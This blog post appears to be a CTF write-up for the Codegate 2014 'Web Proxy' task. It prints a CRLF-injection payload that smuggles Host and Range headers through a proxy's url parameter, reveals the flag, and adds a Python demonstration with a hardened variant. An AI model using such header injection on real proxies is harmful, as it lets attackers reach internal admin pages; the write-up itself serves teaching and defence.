A disturbing lack of taste. Just another WordPress site


Codegate CTF Preliminary 2014 – Web Proxy Writeup

In this task a web proxy is given:

It has a GET parameter "url":

It prints the headers + part of the body. We can easily enter the admin page with:

but since the body isn't printed we can't see the whole response. After a bit of testing it turned out that a CRLF injection was possible, so we can split the body with a Range: header.


Since it wants the Host header to be "hackme", let's do it: HTTP/1.0%0D%0AHost:%20hackme%0D%0ARange:%20bytes=88-127%0D%0AConnection: close%0d%0a%0D%0A

Flag: WH0_IS_SnUS_bI1G_F4N
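
An added example (not code from the original writeup) of why the payload above takes effect and how a proxy can refuse it. It assumes the proxy URL-decodes the "url" parameter and concatenates the path into its outgoing request; target.example and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Suffix from the writeup, appended to the proxy's "url" parameter.
PAYLOAD = ("HTTP/1.0%0D%0AHost:%20hackme%0D%0ARange:%20bytes=88-127"
           "%0D%0AConnection: close%0d%0a%0D%0A")
# Constructed target; the writeup does not show the real URL.
URL_PARAM = "http://target.example/admin/%20" + PAYLOAD

def split_target(url):
    """Split scheme://host/path without normalising control characters."""
    host, _, path = url.split("://", 1)[1].partition("/")
    return host, "/" + path

def naive_request(url_param):
    """Assumed proxy behaviour: the decoded path is pasted into the request."""
    host, path = split_target(unquote(url_param))
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n"

def headers_seen_by_server(raw):
    """The origin server parses the request only up to the first blank line."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    return head[0], dict(line.split(": ", 1) for line in head[1:])

def safe_request(url_param):
    """Hardened variant: refuse control characters and spaces after decoding."""
    host, path = split_target(unquote(url_param))
    if re.search(r"[\x00-\x20\x7f]", host + path):
        raise ValueError("control character or space in proxied URL")
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n"

def range_slice(body, spec):
    """Bytes a server returns for 'bytes=first-last' (both bounds inclusive)."""
    first, last = map(int, spec.split("=", 1)[1].split("-"))
    return body[first:last + 1]

if __name__ == "__main__":
    print(headers_seen_by_server(naive_request(URL_PARAM)))
```

The proxy's own Host header ends up after the injected blank line, so the origin server never parses it; validating the decoded URL before building the request closes the hole.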


Comments (5) Trackbacks (0)
  1. Hello, I don't understand about HTTP/1.0, host:localhost, range=88-127, connection:close.
    Can you tell me what this is? I tried to hack it via LFI, but it couldn't show anything.
    P.S.: Sorry for my English, I'm a beginner.

  2. How do you know the web proxy server agrees the website consistent with the specified HTTP header “range: bytes=”?
